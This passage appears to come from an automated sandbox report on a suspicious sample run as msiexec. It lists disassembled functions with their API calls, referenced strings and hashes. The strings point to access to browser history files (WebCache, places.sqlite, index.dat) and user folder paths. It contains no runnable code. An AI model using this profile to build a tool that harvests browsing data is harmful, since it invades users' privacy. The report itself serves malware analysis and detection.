                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                        Strings
                                                                                        • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                        • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                        • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                        • API String ID: 3354267031-2114579845
                                                                                        • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                        • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                        • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                        • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                        Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                        • API String ID: 2221118986-1725073988
                                                                                        • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                        • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                        • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                        • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                        Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                          • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                        • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$memcmp
                                                                                        • String ID: $$8
                                                                                        • API String ID: 2808797137-435121686
                                                                                        • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                        • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                        • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                        • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                        Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                          • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                          • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                          • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                          • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                          • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                          • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                          • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                          • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                        • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                          • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                          • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                          • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                        • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                        • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                          • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                          • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                          • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                        • String ID:
                                                                                        • API String ID: 1979745280-0
                                                                                        • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                        • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                        • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                        • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                        Function 00414C2E Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                        • memset.MSVCRT ref: 00414C87
                                                                                        • wcscpy.MSVCRT ref: 00414CFC
                                                                                          • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                        Strings
                                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProcVersionmemsetwcscpy
                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                        • API String ID: 4182280571-2036018995
                                                                                        • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                        • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                        • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                        • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                        Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                        • memset.MSVCRT ref: 00403A55
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                        • String ID: history.dat$places.sqlite
                                                                                        • API String ID: 2641622041-467022611
                                                                                        • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                        • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                        • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                        • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                        Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                        • GetLastError.KERNEL32 ref: 00417627
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$File$PointerRead
                                                                                        • String ID:
                                                                                        • API String ID: 839530781-0
                                                                                        • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                        • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                        • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                        • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                        Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFindFirst
                                                                                        • String ID: *.*$index.dat
                                                                                        • API String ID: 1974802433-2863569691
                                                                                        • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                        • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                        • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                        • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                        Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                        • GetLastError.KERNEL32 ref: 004175A2
                                                                                        • GetLastError.KERNEL32 ref: 004175A8
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 1156039329-0
                                                                                        • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                        • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                        • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                        • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                        Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                        • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                        • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                        • String ID:
                                                                                        • API String ID: 3397143404-0
                                                                                        • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                        • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                        • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                        • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                        Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                        • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Temp$DirectoryFileNamePathWindows
                                                                                        • String ID:
                                                                                        • API String ID: 1125800050-0
                                                                                        • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                        • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                        • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                        • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                        Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                        • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandleSleep
                                                                                        • String ID: }A
                                                                                        • API String ID: 252777609-2138825249
                                                                                        • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                        • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                        • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                        • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                        Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: d
                                                                                        • API String ID: 0-2564639436
                                                                                        • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                        • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                        • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                        • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                        Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: BINARY
                                                                                        • API String ID: 2221118986-907554435
                                                                                        • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                        • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                        • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                        • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                        Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp
                                                                                        • String ID: /stext
                                                                                        • API String ID: 2081463915-3817206916
                                                                                        • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                        • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                        • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                        • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                        Function 00406B90 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp
                                                                                        • String ID: .#v
                                                                                        • API String ID: 2081463915-507759092
                                                                                        • Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                        • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                        • Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
                                                                                        • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                        Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                        • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                        • String ID:
                                                                                        • API String ID: 2445788494-0
                                                                                        • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                        • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                        • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                        • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                        Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                        • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 3150196962-0
                                                                                        • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                        • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                        • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                        • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                        Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: malloc
                                                                                        • String ID: failed to allocate %u bytes of memory
                                                                                        • API String ID: 2803490479-1168259600
                                                                                        • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                        • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                        • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                        • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                        Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                        Download Yara Rule
